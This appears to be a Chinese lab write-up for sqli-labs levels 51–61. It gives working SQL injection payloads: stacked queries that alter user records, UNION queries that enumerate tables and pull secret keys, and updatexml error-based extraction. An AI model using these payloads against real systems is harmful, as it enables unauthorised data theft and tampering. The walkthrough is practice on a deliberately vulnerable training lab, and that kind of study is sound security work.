当前位置: 首页 > news >正文

有关网站开发的文献国外推广渠道有哪些方式

news 2025/10/19 17:52:27
有关网站开发的文献,国外推广渠道有哪些方式,自己做的网站怎么改背景图,学生个人网页制作图片Less-51这一关通过查看源代码可知,这一关是字符型以分号的方式闭合的。那我们构造语句?sort1;update users set usernameZZKK where id1 -- 1发现插入数据成功。Less-52这一关仍然是堆叠注入,闭合方式位数字型?sort1;update users set usernameZZKK wh…

Less-51

这一关通过查看源代码可知,这一关是字符型以分号的方式闭合的。

那我们构造语句

?sort=1';update users set username='ZZKK' where id=1 -- 1

发现插入数据成功。

Less-52

这一关仍然是堆叠注入,闭合方式位数字型

?sort=1;update users set username='ZZKK' where id=1 -- 1

堆叠注入攻击成功。

Less-53

这一关还是老样子。堆叠注入。

?sort=1';update users set username='ZKK' where id=1 -- 1

注意堆叠注入原理,是利用数据库支持多条 SQL 语句同时执行(通过分号分隔)的特性,在正常语句后追加恶意 SQL 语句实现攻击。

你可以构造任何的语句来攻击。

Less-54

重这一关开始他对我们的查询次数做了限制,这一关他要求我们10次查询爆出字段信息。

注意这个表和数据生成后,都是随机的。参考的我下面的语法时要注意

先判断闭合,先试一下单引号。

?id=-1') union select 1,2,3 and 1=('1

发现回显点也正常。

那接下来我们直接爆库。

?id=-1' union select 1,database(),3 and 1='1

然后爆表

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 and 1='1

爆字段

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='v35v8dtr7b'),3 and 1='1

爆字段信息

?id=-1' union select 1,(select secret_V535 from kv3lrjc74u),3 and 1='1

然后下面填入我们刚才爆出的密钥

完成。

Less-55

这一关,还是判断闭合,老套路。试了一下,把次数试没了,重置数据库。。。。

还是查看源代码吧。

?id=1) union select 1,2,3--%20

回显点正常。不错,下面就参考上一关的语法。

Less-56

判断闭合方式,次数试没了就重置数据库

?id=-1') union select 1,2,3 and 1=('1

有回显点,下面我就不演示了,参考上面

Less-57

接着试闭合,双引号闭合。换汤不换药,秒了

?id=-1" union select 1,2,3 and 1="1

Less-58

这一关就和上面不一样了,这里只有5次机会了,尝试了一下发现没有回显,但是有sql语句报错回显。所以我们使用报错注入。

先爆库

?id=1'and updatexml(0x7e,concat(1,database()),0x7e)-- %20

再爆表

?id=1'and updatexml(0x7e,concat(1,(select table_name from information_schema.tables where table_schema='challenges')),0x7e)--%20

然后爆字段

?id=1'and updatexml(0x7e,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='cb3groiezl')),0x7e)--%20

然后爆字段信息

?id=1'and updatexml(0x7e,concat(1,(select secret_N6EC from cb3groiezl)),0x7e)-- %20

然后将查出来的密钥,填入下面即可。

完成。

Less-59

和上一关一样。数字型。

?id=1 and updatexml(0x7e,concat(1,database()),0x7e)-- %20

然后下面的步骤和之前一样。

Less-60

这一关仍然一样。双引号括号闭合

?id=1") and updatexml(0x7e,concat(1,database()),0x7e)-- %20

Less-61

这一关闭合方式为单引号括号括号。

?id=1')) and updatexml(0x7e,concat(1,database()),0x7e)-- %20

步骤还是跟上面一样。

http://www.dtcms.com/a/501229.html

相关文章:

  • 网站布局设计软件模板商城建站
  • 石家庄网站建设公司排名手机兼职可以做什么
  • 个别网站网速慢怎么做可以进行网站外链建设的有
  • 建网站公司用什么网站程序网站备案时核验单
  • 手机网站建站公司做网站需要字体授权
  • 货代网站制作邯郸网站优化公司
  • 江门外贸网站建设信阳网络推广公司
  • omp_get_thread_num为0,真是奇怪了。
  • 厦门的服装商城网站建设足球比赛直播在线观看
  • 网站运营作用哈尔滨百度网站建设
  • 河北建设厅网站没有注册广州seo工程师
  • 佛山做公司网站蓝翔老师做的网站
  • 做外贸平台还是网站网站运营主管是干什么的
  • 反馈网站怎么做wordpress5.2.2编辑器中文
  • 惠州营销网站制作合肥专业网站优化费用
  • 网站备案怎么弄邢台网红隧道
  • 没网站域名可以做备案吗温州百度推广排名
  • asp.net网站制作步骤自己做视频网站怎么让加载速度变快
  • 一个网站建设多少钱?沈阳招标中心招标公告
  • 做网站要多少的分辨率杭州制作网页
  • 专业做设计师品牌网站坊子网站建设
  • 点样做网站网站策划书模板
  • 做百度手机网站点击软营销策略论文
  • 百度博客网站模板下载导视设计网站推荐
  • 网站查外链如何做网站拓扑结构图
  • 苏州网站建设的一般流程建设手机移动网站
  • python - 第六天
  • 景区网站建设北京梵客装饰公司地址电话
  • 网站开发平台软件wordpress 代码行号
  • 河源建设工程交易中心网站厦门网站开发排名